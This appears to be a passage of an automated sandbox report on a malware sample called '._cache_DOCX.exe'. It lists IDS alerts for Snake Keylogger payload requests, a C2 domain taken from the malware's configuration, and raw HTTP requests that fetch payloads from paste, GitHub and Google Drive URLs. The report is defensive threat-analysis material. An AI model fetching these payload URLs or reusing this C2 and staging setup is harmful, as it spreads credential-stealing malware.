Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50024 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50026 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50023 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50003 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50015 -> 216.58.206.46:443
Source: Network traffic	Suricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.10:50021 -> 216.58.206.46:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: xred.mooo.com

Uses dynamic DNS services

Source: unknown

DNS query: name: freedns.afraid.org

Source: global traffic

HTTP traffic detected: GET /raw/cdfd23f3b9ad HTTP/1.1Host: paste.foConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 172.111.138.100 172.111.138.100
Source: Joe Sandbox View	IP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox View	IP Address: 69.42.215.252 69.42.215.252

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: VOXILITYGB VOXILITYGB

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	TCP traffic detected without corresponding DNS query: 172.111.138.100
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\._cache_DOCX.exe

Code function: 46_2_006E550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

46_2_006E550C

Source: global traffic	HTTP traffic detected: GET /raw/cdfd23f3b9ad HTTP/1.1Host: paste.foConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /knkbkk212/knkbkk212/refs/heads/main/DOCX.zip HTTP/1.1Host: raw.githubusercontent.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bAtSZSfoXFBiluy46CB7k9cHRpfL4Bz73ZWRWPtP5k3G4Znb18NnXhXdYk8jopoJHGzMy0aIH0-Fg3dPaUleqXNTRyUFEREUv1J1hmPEi9rC8qfgpx5w8U5FK67fWNl8oakfOAzOBcIFTfBpN46uQQLYY_uY4fU8RdYmN11xJrpegf8ZaG8DoXya
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=bAtSZSfoXFBiluy46CB7k9cHRpfL4Bz73ZWRWPtP5k3G4Znb18NnXhXdYk8jopoJHGzMy0aIH0-Fg3dPaUleqXNTRyUFEREUv1J1hmPEi9rC8qfgpx5w8U5FK67fWNl8oakfOAzOBcIFTfBpN46uQQLYY_uY4fU8RdYmN11xJrpegf8ZaG8DoXya
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
Source: global traffic	HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
Source: global traffic	HTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE
Source: global traffic	HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1User-Agent: MyAppHost: freedns.afraid.orgCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: paste.fo
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: docs.google.com
Source: global traffic	DNS traffic detected: DNS query: xred.mooo.com
Source: global traffic	DNS traffic detected: DNS query: freedns.afraid.org
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4lSlIGMB8niklMKGasDIMw_Xw14ReYuoBp36gbJEt7EivP9SvMSW_Esj8xYeegJabqContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:21 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce--tsJwvpQJmOagwSnsCQE0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=LRPRXegY6m9OjZhuz5EvAkPBWAKKRsREt2dk1beNm1QtpheY8ZW1cwkgoG-dICLg2SQHO028TvOIW08hkNVSi0dSOfkAqe_c9o7g41S2SH2_t1T4lC2ZBSFBSDZ650nr5APjJP_BP6LbB1KBmeJHo2RF7MV0FJX5JLvSF_tnTd5YcjzXIxcThWRy; expires=Tue, 01-Jul-2025 10:37:21 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5XWSrhnRB2W18K3eghV2N8q5_dWNDKs_XUbvubQ8fzfWZB0DkqCJVYIaCkvTY_mnPjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:21 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-dogPWXIPWvMAqTqFIal8Rw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=bAtSZSfoXFBiluy46CB7k9cHRpfL4Bz73ZWRWPtP5k3G4Znb18NnXhXdYk8jopoJHGzMy0aIH0-Fg3dPaUleqXNTRyUFEREUv1J1hmPEi9rC8qfgpx5w8U5FK67fWNl8oakfOAzOBcIFTfBpN46uQQLYY_uY4fU8RdYmN11xJrpegf8ZaG8DoXya; expires=Tue, 01-Jul-2025 10:37:21 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5T_ZQIWqWxZ53MH5O0tdZQuxKKyuEoz_11Q2ZeMsv5CCrWWib0Klw-trYwZaLOrl42PjeCgW4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:22 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-DlZJRg2QagAqdZU-uZgWAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=BDl_k14YG7ydbFCT7-3HIJujj9Q3hpU558xakM-GWpIgjkpeFigNKig-zMxkLzdRjVQ2vWFpwy7DN5SSH_HUc6WGPZGpsFz-gxkp7duFfZNFBBQczQ-EC6vww9TYrC0l6vJaLop2QqL5mfcaYXMttFx3iR-aEODuMZDS2X-WkWyELLLuopNMW-E; expires=Tue, 01-Jul-2025 10:37:22 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6OJJOwGU7Ug3cBz3vUiBrcKNE3WsvQHNsh6af8ZWuj9AjXNuEx1xvebi8aWZ2ojqI5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:22 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-gkcns_wxRuqi41G_tobIIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=ZSZMHllb1NDr1jK19FckOeOGGya5FkM84zwhMgP8mE8rR7Lbdm-96remBSUvN_oU566hN2isnotoFYo3HQCXRxMubCYAl2QhcoDEyclnTCTgOn-t1hUea8-hATfb1nhSlWZ5JqXRH3C-DNo-I-MxsHqPmjdmaoq4ATZvSPZjdtYpFkNizILGmVE; expires=Tue, 01-Jul-2025 10:37:22 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4P_Q58FhK4ihuydHm9MOab7nqeHy1eiXkm1bZpO2VEooyYI7Gjk58LFO2KMis7_817Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:23 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-U14gpIBurdJLDQ1UdXqQUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5d_H4A3b6n9hdQ9hSLphQYG29Vy851XglmbAkAx8VWIqWsGPfBH2XN1h7nfxEKpjW1Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:23 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-CZjwJadSwfGUt_hr4gEAUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5dk3HSIPwIpB5WyL9Kzks5myKX-tgDz3GMQ90kFy_Kn4j7emx84D35IL1BdQV2UxQhContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:25 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-HOjRR77zXMleq1GXI9yvew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6sT7FbBN1C_HL2rEjXojkKlwnu1LrWEEqXXx3vZeQkAn_xtZOTEeGn1iDuPQSg1p57Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-IPCJW3UoP3749lIwpK_P_g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kGUnk2oA3qqhuKjNixBQe6d78hz5TAXhUoeiGFL_dgg-mub5LS8erIVLaSk2nsvPeContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:37:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QzGPbE10b0BqZcgEpjsmuA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
